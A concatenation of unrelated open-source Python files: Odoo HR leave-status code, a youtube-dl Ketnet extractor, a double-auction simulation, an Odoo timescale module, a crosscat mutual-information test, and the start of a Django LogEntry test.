def _get_leave_status(self, cr, uid, ids, name, args, context=None):
holidays_obj = self.pool.get('hr.holidays')
holidays_id = holidays_obj.search(cr, uid,
[('employee_id', 'in', ids), ('date_from','<=',time.strftime('%Y-%m-%d %H:%M:%S')),
('date_to','>=',time.strftime('%Y-%m-%d 23:59:59')),('type','=','remove'),('state','not in',('cancel','refuse'))],
context=context)
result = {}
for id in ids:
result[id] = {
'current_leave_state': False,
'current_leave_id': False,
'leave_date_from':False,
'leave_date_to':False,
}
for holiday in self.pool.get('hr.holidays').browse(cr, uid, holidays_id, context=context):
result[holiday.employee_id.id]['leave_date_from'] = holiday.date_from
result[holiday.employee_id.id]['leave_date_to'] = holiday.date_to
result[holiday.employee_id.id]['current_leave_state'] = holiday.state
result[holiday.employee_id.id]['current_leave_id'] = holiday.holiday_status_id.id
return result
def _leaves_count(self, cr, uid, ids, field_name, arg, context=None):
Holidays = self.pool['hr.holidays']
return {
employee_id: Holidays.search_count(cr,uid, [('employee_id', '=', employee_id), ('type', '=', 'remove')], context=context)
for employee_id in ids
}
_columns = {
'remaining_leaves': fields.function(_get_remaining_days, string='Remaining Legal Leaves', fnct_inv=_set_remaining_days, type="float", help='Total number of legal leaves allocated to this employee, change this value to create allocation/leave request. Total based on all the leave types without overriding limit.'),
'current_leave_state': fields.function(_get_leave_status, multi="leave_status", string="Current Leave Status", type="selection",
selection=[('draft', 'New'), ('confirm', 'Waiting Approval'), ('refuse', 'Refused'),
('validate1', 'Waiting Second Approval'), ('validate', 'Approved'), ('cancel', 'Cancelled')]),
'current_leave_id': fields.function(_get_leave_status, multi="leave_status", string="Current Leave Type",type='many2one', relation='hr.holidays.status'),
'leave_date_from': fields.function(_get_leave_status, multi='leave_status', type='date', string='From Date'),
'leave_date_to': fields.function(_get_leave_status, multi='leave_status', type='date', string='To Date'),
'leaves_count': fields.function(_leaves_count, type='integer', string='Leaves'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
aboutsajjad/Bridge | app_packages/youtube_dl/extractor/ketnet.py | 27 | 3490 | from __future__ import unicode_literals
from .canvas import CanvasIE
from .common import InfoExtractor
class KetnetIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?ketnet\.be/(?:[^/]+/)*(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'https://www.ketnet.be/kijken/zomerse-filmpjes',
'md5': '6bdeb65998930251bbd1c510750edba9',
'info_dict': {
'id': 'zomerse-filmpjes',
'ext': 'mp4',
'title': 'Gluur mee op de filmset en op Pennenzakkenrock',
'description': 'Gluur mee met Ghost Rockers op de filmset',
'thumbnail': r're:^https?://.*\.jpg$',
}
}, {
# mzid in playerConfig instead of sources
'url': 'https://www.ketnet.be/kijken/nachtwacht/de-greystook',
'md5': '90139b746a0a9bd7bb631283f6e2a64e',
'info_dict': {
'id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'display_id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'ext': 'flv',
'title': 'Nachtwacht: De Greystook',
'description': 'md5:1db3f5dc4c7109c821261e7512975be7',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 1468.03,
},
'expected_warnings': ['is not a supported codec', 'Unknown MIME type'],
}, {
'url': 'https://www.ketnet.be/kijken/karrewiet/uitzending-8-september-2016',
'only_matching': True,
}, {
'url': 'https://www.ketnet.be/achter-de-schermen/sien-repeteert-voor-stars-for-life',
'only_matching': True,
}, {
# mzsource, geo restricted to Belgium
'url': 'https://www.ketnet.be/kijken/nachtwacht/de-bermadoe',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
config = self._parse_json(
self._search_regex(
r'(?s)playerConfig\s*=\s*({.+?})\s*;', webpage,
'player config'),
video_id)
mzid = config.get('mzid')
if mzid:
return self.url_result(
'https://mediazone.vrt.be/api/v1/ketnet/assets/%s' % mzid,
CanvasIE.ie_key(), video_id=mzid)
title = config['title']
formats = []
for source_key in ('', 'mz'):
source = config.get('%ssource' % source_key)
if not isinstance(source, dict):
continue
for format_id, format_url in source.items():
if format_id == 'hls':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4',
entry_protocol='m3u8_native', m3u8_id=format_id,
fatal=False))
elif format_id == 'hds':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': config.get('description'),
'thumbnail': config.get('image'),
'series': config.get('program'),
'episode': config.get('episode'),
'formats': formats,
}
| mit |
erelsgl/economics | double-auction-simulations/main.AAAI18-submission.py | 1 | 15070 | #!python3
"""
Simulation of single-type multi-unit double-auction mechanisms.
Author: Erel Segal-Halevi
Since : 2017-07
"""
import numpy as np
import pandas as pd
from pandas import DataFrame
from pandas.tools import plotting
import matplotlib.pyplot as plt
import math
import os
import random
from doubleauction import MUDA,WALRAS,walrasianEquilibrium,randomTradeWithExogeneousPrice
import torq_datasets_read as torq
from random_datasets import randomAuctions
COLUMNS=(
'Total buyers', 'Total sellers', 'Total traders', 'Min total traders', 'Total units',
'Max units per trader', 'Min units per trader', 'Normalized max units per trader', 'stddev',
'Optimal buyers', 'Optimal sellers', 'Optimal units',
'Optimal gain', 'MUDA-lottery gain', 'MUDA-Vickrey traders gain', 'MUDA-Vickrey total gain')
def replicaAuctions(replicaNums:list, auctions:list):
"""
INPUT: auctions - list of m auctions;
replicaNums - list of n integers.
OUTPUT: generator of m*n auctions, where in each auction, each agent is replicated i times.
"""
for auctionID,auctionTraders in auctions:
for replicas in replicaNums:
traders = replicas * auctionTraders
yield auctionID,traders
def sampleAuctions(agentNums:list, auctions:list):
"""
INPUT: auctions - list of m auctions;
agentNums - list of n integers.
OUTPUT: generator of m*n auctions, where in each auction, i agents are sampled from the empirical distribution
"""
for auctionID,auctionTraders in auctions:
for agentNum in agentNums:
traders = [random.choice(auctionTraders) for i in range(agentNum)]
yield auctionID,traders
def simulateAuctions(auctions:list, resultsFilename:str, keyColumns:list):
"""
Simulate the auctions in the given generator.
"""
columns = keyColumns+COLUMNS
results = DataFrame(columns=columns)
print("\t{}".format(columns))
resultsFilenameTemp = resultsFilename+".temp"
for auctionID,traders in auctions:
if not traders:
raise ValueError("traders for auction {} is empty", auctionID)
print("Simulating auction {} with {} traders".format(auctionID,len(traders)))
totalBuyers = sum([t.isBuyer for t in traders])
totalSellers = len(traders)-totalBuyers
unitsPerTrader = [t.totalUnits() for t in traders]
maxUnitsPerTrader = max(unitsPerTrader)
minUnitsPerTrader = min(unitsPerTrader)
stddev = np.sqrt(sum([t.totalUnits()**2 for t in traders]))
(buyersWALRAS, sellersWALRAS, sizeWALRAS, gainWALRAS) = WALRAS(traders)
(sizeMUDALottery, gainMUDALottery, gainMUDALottery, sizeMUDAVickrey, tradersGainMUDAVickrey, totalGainMUDAVickrey) = MUDA(traders, Lottery=True, Vickrey=True)
resultsRow = [
*auctionID,
totalBuyers, totalSellers, totalBuyers+totalSellers, min(totalBuyers,totalSellers), sum(unitsPerTrader),
maxUnitsPerTrader, minUnitsPerTrader, maxUnitsPerTrader/max(1,minUnitsPerTrader), stddev,
buyersWALRAS, sellersWALRAS, sizeWALRAS,
gainWALRAS, gainMUDALottery, tradersGainMUDAVickrey, totalGainMUDAVickrey]
print("\t{}".format(resultsRow))
results.loc[len(results)] = resultsRow
results.to_csv(resultsFilenameTemp)
results.to_csv(resultsFilename)
os.remove(resultsFilenameTemp)
return results
def torqSimulationBySymbolDate(filename, combineByOrderDate=False, replicaNums=[1]):
"""
Treat each (symbol,date) combination as a separate auction.
"""
datasetFilename = "datasets/"+filename+".CSV"
resultsFilename = "results/"+filename+("-combined" if combineByOrderDate else "")+"-x"+str(max(replicaNums))+".csv"
return simulateAuctions(replicaAuctions(replicaNums,
torq.auctionsBySymbolDate(datasetFilename, combineByOrderDate)),
resultsFilename, keyColumns=("symbol","date"))
def torqSimulateBySymbol(filename, combineByOrderDate=False, agentNums=[100]):
"""
Treat all bidders for the same symbol, in ALL dates, as a distribution of values for that symbol.
"""
datasetFilename = "datasets/"+filename+".CSV"
resultsFilename = "results/"+filename+("-combined" if combineByOrderDate else "")+"-s"+str(max(agentNums))+".csv"
return simulateAuctions(sampleAuctions(agentNums,
torq.auctionsBySymbol(datasetFilename, combineByOrderDate)),
resultsFilename, keyColumns=("symbol",))
### PLOTS ###
YLABEL = 'MUDA GFT divided by maximum GFT'
YLIM = [0,1.05]
titleFontSize = 20
legendFontSize = 20
axesFontSize = 20
markerSize = 14
def plotTorq(filename, resultsFilename=None, combineByOrderDate=False, replicaNums=None, agentNums=None, numOfBins=10, ax=None, title=None, xColumn = 'Optimal units'):
if resultsFilename:
pass
elif replicaNums:
resultsFilename = "results/"+\
filename+\
("-combined" if combineByOrderDate else "")+\
"-x"+str(max(replicaNums))+\
".csv"
elif agentNums:
resultsFilename = "results/"+\
filename+\
("-combined" if combineByOrderDate else "")+\
"-s"+str(max(agentNums))+\
".csv"
else:
raise(Error("cannot calculate resultsFilename"))
plotResults(resultsFilename, xColumn=xColumn, numOfBins=numOfBins, ax=ax, title=title)
def plotResults(resultsFilename=None, xColumn='Min total traders', numOfBins=10, ax=None, title=None):
if not ax:
ax = plt.subplot(1, 1, 1)
if not title:
title = resultsFilename
print("plotting",resultsFilename)
results = pd.read_csv(resultsFilename)
results['Optimal market size'] = (results['Optimal buyers']+results['Optimal sellers']) / 2
results['Normalized market size'] = results['Optimal units'] / (results['Max units per trader'])
results['log10(M)'] = np.log(results['Max units per trader'])/np.log(10)
print(len(results), " auctions")
results = results[results['Optimal gain']>0]
print(len(results), " auctions with positive optimal gain")
for field in ['MUDA-lottery', 'MUDA-Vickrey traders', 'MUDA-Vickrey total']:
results[field+' ratio'] = results[field+' gain'] / results['Optimal gain']
if numOfBins:
results_bins = results.groupby(pd.cut(results[xColumn],numOfBins)).mean()
else:
results_bins = results.groupby(results[xColumn]).mean()
results_bins.plot(x=xColumn, y='MUDA-Vickrey total ratio', style=['b^-'], ax=ax, markersize=markerSize)
results_bins.plot(x=xColumn, y='MUDA-Vickrey traders ratio', style=['gv-'], ax=ax, markersize=markerSize)
results_bins.plot(x=xColumn, y='MUDA-lottery ratio', style=['ro-'], ax=ax, markersize=markerSize)
#plt.legend(loc=0,prop={'size':legendFontSize})
ax.legend_.remove()
ax.set_title(title, fontsize= titleFontSize, weight='bold')
ax.set_ylabel(YLABEL, fontsize= axesFontSize)
ax.tick_params(axis='both', which='major', labelsize=axesFontSize)
ax.tick_params(axis='both', which='minor', labelsize=axesFontSize)
ax.set_ylim(YLIM)
### MAIN PROGRAM ###
MUDA.LOG = randomTradeWithExogeneousPrice.LOG = False
def torqSimulation():
numOfBins = 100
numOfTraderss=list(range(10,1000,10))*1
filename = "901101-910131-SOD" #"910121-910121-IBM-SOD" # "901101-910131-SOD" # "901101-910131- SOD-NORM" #
if createResults:
torqSimulateBySymbol(filename, combineByOrderDate=True, agentNums=numOfTraderss)
torqSimulateBySymbol(filename, combineByOrderDate=False, agentNums=numOfTraderss)
#torqSimulateBySymbol(filename+"-NORM", combineByOrderDate=False, agentNums=numOfTraderss)
#torqSimulateBySymbol(filename+"-NORM", combineByOrderDate=True, agentNums=numOfTraderss)
#plotTorq(filename=filename, combineByOrderDate=False, agentNums=numOfTraderss, numOfBins=numOfBins)
# plotTorq(filename=filename, combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
# ax = plt.subplot(1,1,1), title="Auctions based on TORQ database", xColumn="Optimal units")
# plt.xlabel('Optimal #units (k)')
ax = plt.subplot(1,2,2)
plotTorq(filename=filename, combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
ax=ax, title="TORQ; combined", xColumn="Total traders")
ax.set_xlabel('Total #traders', fontsize=axesFontSize)
ax.set_xlim([0,1000])
ax.set_ylabel("")
ax = plt.subplot(1,2,1, sharey=None)
plotTorq(filename=filename, combineByOrderDate=False, agentNums=numOfTraderss, numOfBins=numOfBins, ax=ax, title="TORQ; additive", xColumn="Total traders")
ax.set_xlabel('Total #traders', fontsize=axesFontSize)
ax.set_xlim([0,1000])
plt.show()
# ax = plt.subplot(1,2,2)
# plotTorq(filename=filename+"-NORM", combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
# ax=ax, title="TORQ; normalized, combined", xColumn="Total traders")
# ax.set_xlabel('Total #traders', fontsize=axesFontSize)
# ax.set_xlim([0,1000])
# ax = plt.subplot(1,2,1, sharey=ax)
# plotTorq(filename=filename+"-NORM", combineByOrderDate=False, agentNums=numOfTraderss, numOfBins=numOfBins, ax=ax, title="TORQ; normalized, additive", xColumn="Total traders")
# ax.set_xlabel('Total #traders', fontsize=axesFontSize)
# ax.set_xlim([0,1000])
# plt.show()
# plotTorq(filename=filename+"-NORM", combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
# ax = plt.subplot(2,1,2))
# plt.show()
def randomSimulation(numOfAuctions = 100):
numOfTraderss = range(2000000, 42000000, 2000000)
minNumOfUnitsPerTrader = 10
maxNumOfUnitsPerTraders = [100,1000,10000,1000000,10000000,100000000,100000]
meanValue = 500
maxNoiseSizes = [50,100,150,200,300,350,400,450,500,250]
numOfBins = 20
# general
filenameTraders = "results/random-traders-{}units-{}noise.csv".format(maxNumOfUnitsPerTraders[-1],maxNoiseSizes[-1])
filenameUnitsFixedTraders = "results/random-units-{}traders-{}noise.csv".format(numOfTraderss[-1],maxNoiseSizes[-1])
filenameUnitsFixedVirtual = "results/random-units-{}virtual-{}noise.csv".format(numOfTraderss[-1],maxNoiseSizes[-1])
filenameNoise = "results/random-noise-{}traders-{}units.csv".format(numOfTraderss[-1],maxNumOfUnitsPerTraders[3])
# additive
filenameTradersAdd = "results/random-traders-{}units-{}noise-additive.csv".format(maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1])
filenameUnitsAdd = "results/random-units-{}traders-{}noise-additive.csv".format(numOfTraderss[-1],maxNoiseSizes[-1])
filenameNoiseAdd = "results/random-noise-{}traders-{}units-additive.csv".format(numOfTraderss[-1],maxNumOfUnitsPerTraders[3])
if createResults:
keyColumns=("numOfTraders","minNumOfUnitsPerTrader","maxNumOfUnitsPerTrader","maxNoiseSize")
### non-additive
simulateAuctions(randomAuctions( ### as function of #traders
numOfAuctions, numOfTraderss, minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=True),
filenameTraders, keyColumns=keyColumns)
simulateAuctions(randomAuctions( ### as function of m - fixed total units
numOfAuctions, numOfTraderss[-1:], minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=True),
filenameUnitsFixedVirtual, keyColumns=keyColumns)
# simulateAuctions(randomAuctions( ### as function of m - fixed total traders - TOO LONG
# numOfAuctions, [100], minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=False),
# filenameUnitsFixedTraders, keyColumns=keyColumns)
simulateAuctions(randomAuctions( ### as function of noise
numOfAuctions, numOfTraderss[-1:], minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes, fixedNumOfVirtualTraders=True),
filenameNoise, keyColumns=keyColumns)
### additive
# simulateAuctions(randomAuctions( ### as function of #traders
# numOfAuctions, numOfTraderss, maxNumOfUnitsPerTraders[3], maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=True),
# filenameTradersAdd, keyColumns=keyColumns)
# # simulateAuctions(randomAuctions( ### as function of m - fixed total units
# # numOfAuctions, numOfTraderss[-1:], maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:],isAdditive=True, fixedNumOfVirtualTraders=True),
# # filenameUnitsAdd, keyColumns=keyColumns)
# simulateAuctions(randomAuctions( ### as function of noise
# numOfAuctions, numOfTraderss[-1:], maxNumOfUnitsPerTraders[3], maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes, fixedNumOfVirtualTraders=True),
# filenameNoiseAdd, keyColumns=keyColumns)
# # simulateAuctions(randomAuctions( ### as function of m - fixed total traders
# # numOfAuctions, [100], maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:], isAdditive=True, fixedNumOfVirtualTraders=False),
# # filenameUnitsFixedTraders, keyColumns=keyColumns)
TITLESTART = ""# "Uniform; "
### non-additive
ax=plt.subplot(1,2,1)
plotResults(filenameTraders,"Total traders",numOfBins, ax, title=
TITLESTART+"m={},M={},noise={}".format(minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[-1],maxNoiseSizes[-1]))
ax.set_xlabel('Total #traders', fontsize=axesFontSize)
ax.set_xlim([0,1000])
# ax=plt.subplot(1,1,1)
# plotResults(filenameTraders,"Optimal units",numOfBins, ax, title=
# TITLESTART+"m={},M={},noise={}".format(minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1]))
# plt.xlabel('Optimal #units (k)')
# plt.show()
ax=plt.subplot(1,2,2, sharey=None)
plotResults(filenameUnitsFixedVirtual,"log10(M)",numOfBins=None, ax=ax, title=TITLESTART+"m={},units={},noise={}".format(minNumOfUnitsPerTrader,numOfTraderss[-1],maxNoiseSizes[-1]))
#labels = [""]+["{:.0e}".format(t) for t in sorted(maxNumOfUnitsPerTraders)]
ax.set_xlim([1,8])
ax.set_xticklabels(["","100","1e3","1e4","1e5","1e6","1e7","1e8"])
ax.set_xlabel('Max #units per trader (M)', fontsize=axesFontSize)
ax.set_ylabel("")
plt.show()
# plotResults(filenameUnitsFixedTraders,"maxNumOfUnitsPerTrader",numOfBins, plt.subplot(1,1,1),
# title="traders={}, noise={}".format(numOfTraderss[-1],maxNoiseSizes[-1]))
# plt.xlabel('#units per trader (M)')
# plt.show()
# plotResults(filenameNoise,"maxNoiseSize",numOfBins, plt.subplot(1,1,1),
# title=TITLESTART+"units={},m={},M={}".format(numOfTraderss[-1],minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[3]))
# plt.xlabel('Max noise size (A)', fontsize=axesFontSize)
# plt.show()
### additive
# # plotResults(filenameTradersAdd,"numOfTraders",numOfBins, plt.subplot(1,1,1), title=TITLESTART+"m={},M={},n oise={}, additive".format(minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1]))
# # plt.xlabel('total #units')
# plotResults(filenameTradersAdd,"Optimal units",numOfBins, plt.subplot(1,1,1),
# title=TITLESTART+"m={},M={},noise={},additive".format(minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1]))
# plt.xlabel('optimal #units (k)')
# plt.show()
#
# # plotResults(filenameUnitsAdd,"maxNumOfUnitsPerTrader",numOfBins, plt.subplot(1,1,1),
# # title=TITLESTART+"traders={},noise={},additive".format(numOfTraderss[-1],maxNoiseSizes[-1]))
# # plt.ylabel('')
# plotResults(filenameNoiseAdd,"maxNoiseSize",numOfBins, plt.subplot(1,1,1),
# title=TITLESTART+"traders={},m={},M={},additive".format(numOfTraderss[-1],minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[3]))
# plt.xlabel('Max noise size (A)')
# plt.show()
createResults = False # True #
torqSimulation()
randomSimulation(numOfAuctions = 10)
| lgpl-2.1 |
papouso/odoo | addons/resource/faces/timescale.py | 263 | 3899 | ############################################################################
# Copyright (C) 2005 by Reithinger GmbH
# mreithinger@web.de
#
# This file is part of faces.
#
# faces is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# faces is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
############################################################################
import faces.pcalendar as pcal
import openerp.tools as tools
import datetime
import sys
class TimeScale(object):
def __init__(self, calendar):
self.data_calendar = calendar
self._create_chart_calendar()
self.now = self.to_num(self.data_calendar.now)
def to_datetime(self, xval):
return xval.to_datetime()
def to_num(self, date):
return self.chart_calendar.WorkingDate(date)
def is_free_slot(self, value):
dt1 = self.chart_calendar.to_starttime(value)
dt2 = self.data_calendar.to_starttime\
(self.data_calendar.from_datetime(dt1))
return dt1 != dt2
def is_free_day(self, value):
dt1 = self.chart_calendar.to_starttime(value)
dt2 = self.data_calendar.to_starttime\
(self.data_calendar.from_datetime(dt1))
return dt1.date() != dt2.date()
def _create_chart_calendar(self):
dcal = self.data_calendar
ccal = self.chart_calendar = pcal.Calendar()
ccal.minimum_time_unit = 1
#pad worktime slots of calendar (all days should be equally long)
slot_sum = lambda slots: sum(map(lambda slot: slot[1] - slot[0], slots))
day_sum = lambda day: slot_sum(dcal.get_working_times(day))
max_work_time = max(map(day_sum, range(7)))
#working_time should have 2/3
sum_time = 3 * max_work_time / 2
#now create timeslots for ccal
def create_time_slots(day):
src_slots = dcal.get_working_times(day)
slots = [0, src_slots, 24*60]
slots = tuple(tools.flatten(slots))
slots = zip(slots[:-1], slots[1:])
#balance non working slots
work_time = slot_sum(src_slots)
non_work_time = sum_time - work_time
non_slots = filter(lambda s: s not in src_slots, slots)
non_slots = map(lambda s: (s[1] - s[0], s), non_slots)
non_slots.sort()
slots = []
i = 0
for l, s in non_slots:
delta = non_work_time / (len(non_slots) - i)
delta = min(l, delta)
non_work_time -= delta
slots.append((s[0], s[0] + delta))
i += 1
slots.extend(src_slots)
slots.sort()
return slots
min_delta = sys.maxint
for i in range(7):
slots = create_time_slots(i)
ccal.working_times[i] = slots
min_delta = min(min_delta, min(map(lambda s: s[1] - s[0], slots)))
ccal._recalc_working_time()
self.slot_delta = min_delta
self.day_delta = sum_time
self.week_delta = ccal.week_time
_default_scale = TimeScale(pcal._default_calendar)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
probcomp/crosscat | scripts/mi_tests/test_mutual_information.py | 2 | 6434 | #
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# calculated the mutual information of various shapes of data
import numpy
import pylab as pl
import crosscat.utils.sample_utils as su
import crosscat.utils.inference_utils as iu
import crosscat.utils.data_utils as du
import crosscat.cython_code.State as State
import random
import math
def ring(n=200):
X = numpy.zeros((n,2))
for i in range(n):
angle = random.uniform(0,2*math.pi)
distance = random.uniform(1,1.5)
X[i,0] = math.cos(angle)*distance
X[i,1] = math.sin(angle)*distance
return X
def circle(n=200):
X = numpy.zeros((n,2))
for i in range(n):
angle = random.uniform(0,2*math.pi)
distance = random.uniform(0,1.5)
X[i,0] = math.cos(angle)*distance
X[i,1] = math.sin(angle)*distance
return X
def square(n=200):
X = numpy.zeros((n,2))
for i in range(n):
x = random.uniform(-1,1)
y = random.uniform(-1,1)
X[i,0] = x
X[i,1] = y
return X
def diamond(n=200):
X = square(n=n)
for i in range(n):
angle = math.atan(X[i,1]/X[i,0])
angle += math.pi/4
hyp = (X[i,0]**2.0+X[i,1]**2.0)**.5
x = math.cos(angle)*hyp
y = math.sin(angle)*hyp
X[i,0] = x
X[i,1] = y
return X
def four_dots(n=200):
X = numpy.zeros((n,2))
nb = n/4
mx = [ -1, 1, -1, 1]
my = [ -1, -1, 1, 1]
s = .25
for i in range(n):
n = random.randrange(4)
x = random.normalvariate(mx[n], s)
y = random.normalvariate(my[n], s)
X[i,0] = x
X[i,1] = y
return X
def correlated(r,n=200):
X = numpy.random.multivariate_normal([0,0], [[1, r],[r, 1]], n)
return X
def sample_from_view(M_c, X_L, X_D, get_next_seed):
view_col = X_L['column_partition']['assignments'][0]
view_col2 = X_L['column_partition']['assignments'][1]
same_view = True
if view_col2 != view_col:
same_view = False
view_state = X_L['view_state'][view_col]
view_state2 = X_L['view_state'][view_col2]
cluster_crps = numpy.exp(su.determine_cluster_crp_logps(view_state))
cluster_crps2 = numpy.exp(su.determine_cluster_crp_logps(view_state2))
assert( math.fabs(numpy.sum(cluster_crps) - 1) < .00000001 )
samples = numpy.zeros((n,2))
cluster_idx1 = numpy.nonzero(numpy.random.multinomial(1, cluster_crps))[0][0]
cluster_model1 = su.create_cluster_model_from_X_L(M_c, X_L, view_col, cluster_idx1)
if same_view:
cluster_idx2 = cluster_idx1
cluster_model2 = cluster_model1
else:
cluster_idx2 = numpy.nonzero(numpy.random.multinomial(1, cluster_crps2))[0][0]
cluster_model2 = su.create_cluster_model_from_X_L(M_c, X_L, view_col2, cluster_idx2)
component_model1 = cluster_model1[0]
x = component_model1.get_draw(get_next_seed())
component_model2 = cluster_model2[1]
y = component_model2.get_draw(get_next_seed())
return x, y
def sample_data_from_crosscat(M_c, X_Ls, X_Ds, get_next_seed, n):
X = numpy.zeros((n,2))
n_samples = len(X_Ls)
for i in range(n):
cc = random.randrange(n_samples)
x, y = sample_from_view(M_c, X_Ls[cc], X_Ds[cc], get_next_seed)
X[i,0] = x
X[i,1] = y
return X
def do_test(which_plot, max_plots, n, burn_in, cc_samples, which_test, correlation=0, do_plot=False):
if which_test is "correlated":
X = correlated(correlation, n=n)
elif which_test is "square":
X = square(n=n)
elif which_test is "ring":
X = ring(n=n)
elif which_test is "circle":
X = circle(n=n)
elif which_test is "diamond":
X = diamond(n=n)
elif which_test is "blob":
X = correlated(0.0, n=n)
elif which_test is "dots":
X = four_dots(n=n)
elif which_test is "mixed":
X = numpy.vstack((correlated(.95, n=n/2),correlated(0, n=n/2)))
get_next_seed = lambda : random.randrange(32000)
# Build a state
M_c = du.gen_M_c_from_T(X.tolist())
state = State.p_State(M_c, X.tolist())
X_Ls = []
X_Ds = []
# collect crosscat samples
for _ in range(cc_samples):
state = State.p_State(M_c, X.tolist())
state.transition(n_steps=burn_in)
X_Ds.append(state.get_X_D())
X_Ls.append(state.get_X_L())
SX = sample_data_from_crosscat(M_c, X_Ls, X_Ds, get_next_seed, n)
if do_plot:
pl.subplot(2,max_plots,which_plot)
pl.scatter(X[:,0],X[:,1],c='blue',alpha=.5)
pl.title("Original data")
pl.subplot(2,max_plots,max_plots+which_plot)
pl.scatter(SX[:,0],SX[:,1],c='red',alpha=.5)
pl.title("Sampled data")
pl.show
return M_c, X_Ls, X_Ds
def MI_test(n, burn_in, cc_samples, which_test, n_MI_samples=500, correlation=0):
get_next_seed = lambda : random.randrange(32000)
M_c, X_Ls, X_Ds = do_test(0, 0, n, burn_in, cc_samples, "correlated", correlation=correlation, do_plot=False)
# query column 0 and 1
MI, Linfoot = iu.mutual_information(M_c, X_Ls, X_Ds, [(0,1)],
get_next_seed, n_samples=n_MI_samples)
MI = numpy.mean(MI)
Linfoot = numpy.mean(Linfoot)
if which_test == "correlated":
test_strn = "Test: correlation (%1.2f), N: %i, burn_in: %i, samples: %i, MI_samples: %i\n\tMI: %f, Linfoot %f" % (correlation, n, burn_in, cc_samples, n_MI_samples, MI, Linfoot)
else:
test_strn = "Test: %s, N: %i, burn_in: %i, samples: %i, MI_samples: %i\n\tMI: %f, Linfoot %f" % (which_test, n, burn_in, cc_samples, n_MI_samples, MI, Linfoot)
print(test_strn)
return test_strn
do_plot = False
n_mi_samples = 500
N = [10, 100, 1000]
burn_in = 200
cc_samples = 10
print(" ")
for n in N:
strn = MI_test(n, burn_in, cc_samples, "correlated", correlation=.3)
strn = MI_test(n, burn_in, cc_samples, "correlated", correlation=.6)
strn = MI_test(n, burn_in, cc_samples, "correlated", correlation=.9)
strn = MI_test(n, burn_in, cc_samples, "ring")
strn = MI_test(n, burn_in, cc_samples, "dots")
strn = MI_test(n, burn_in, cc_samples, "mixed")
| apache-2.0 |
kawamon/hue | desktop/core/ext-py/Django-1.11.29/tests/admin_utils/test_logentry.py | 5 | 11611 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from datetime import datetime
from django.contrib.admin.models import ADDITION, CHANGE, DELETION, LogEntry
from django.contrib.admin.utils import quote
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils import six, translation
from django.utils.encoding import force_bytes
from django.utils.html import escape
from .models import Article, ArticleProxy, Site
@override_settings(ROOT_URLCONF='admin_utils.urls')
class LogEntryTests(TestCase):
def setUp(self):
self.user = User.objects.create_superuser(username='super', password='secret', email='super@example.com')
self.site = Site.objects.create(domain='example.org')
self.a1 = Article.objects.create(
site=self.site,
title="Title",
created=datetime(2008, 3, 12, 11, 54),
)
content_type_pk = ContentType.objects.get_for_model(Article).pk
LogEntry.objects.log_action(
self.user.pk, content_type_pk, self.a1.pk, repr(self.a1), CHANGE,
change_message='Changed something'
)
self.client.force_login(self.user)
def test_logentry_save(self):
"""
LogEntry.action_time is a timestamp of the date when the entry was
created. It shouldn't be updated on a subsequent save().
"""
